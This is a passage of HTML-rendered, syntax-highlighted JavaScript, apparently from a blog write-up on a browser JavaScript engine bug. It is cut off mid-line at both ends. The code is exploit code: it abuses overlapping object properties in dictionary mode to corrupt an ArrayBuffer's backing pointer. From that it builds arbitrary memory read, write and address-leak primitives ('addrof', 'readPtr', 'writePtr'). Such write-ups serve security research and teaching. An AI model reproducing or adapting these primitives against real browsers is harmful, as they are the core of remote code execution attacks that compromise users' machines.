class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-137\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">!==<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">13.38<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-138\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">r<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">toBigInt<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-139\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-140\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-141\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">fail<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#8220;Corrupt ArrayBuffer failed&#8221;<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-142\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-143\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-144\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-i\">let<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">find_overlapping_properties<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-145\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Properties<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">p1<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">and<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">p<\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-v\">p2<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">overlap <\/span><span class=\"crayon-e\">after <\/span><span class=\"crayon-e\">conversion <\/span><span class=\"crayon-st\">to<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">dictionary <\/span><span class=\"crayon-v\">mode<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-146\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-147\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1024<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-148\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">driver_buf<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">1024<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-149\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-150\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">gc<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-151\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-152\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-153\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memview_buf_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">addrof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-154\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memview_buf_addr<\/span><span class=\"crayon-o\">&#8212;<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-155\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">log<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">ArrayBuffer<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">@<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">$<\/span><span class=\"crayon-sy\">{<\/span><span class=\"crayon-e\">hex<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">`<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-156\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-157\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">original_driver_buf_ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">corrupt_arraybuffer<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">driver_buf<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memview_buf_addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-158\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-159\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">driver<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BigUint64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">driver_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-160\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">original_memview_buf_ptr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">driver<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-161\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-162\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memory<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-163\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">write<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-164\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">driver<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-165\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-166\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">set<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">bytes<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-167\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-168\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">read<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-169\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">driver<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-170\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">Uint8Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-171\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">subarray<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">len<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-172\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-173\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-174\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">driver<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-175\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BigUint64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-176\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-177\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-178\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">writePtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-179\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">driver<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">addr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-180\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">new<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">BigUint64Array<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-181\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memview<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">ptr<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-182\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-183\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">addrof<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-sy\">{<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-184\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">memview_buf<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">leakMe<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">obj<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-185\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span class=\"crayon-v\">props<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">memview_buf_addr<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">8n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-186\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-r\">this<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">readPtr<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">props<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">+<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">15n<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&#8211;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">1n<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-187\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">,<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-188\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-sy\">}<\/span><span class=\"crayon-sy\">;<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-5bd7875724109470309230-189\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-5bd7875724109470309230-190\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">let <\/span><span 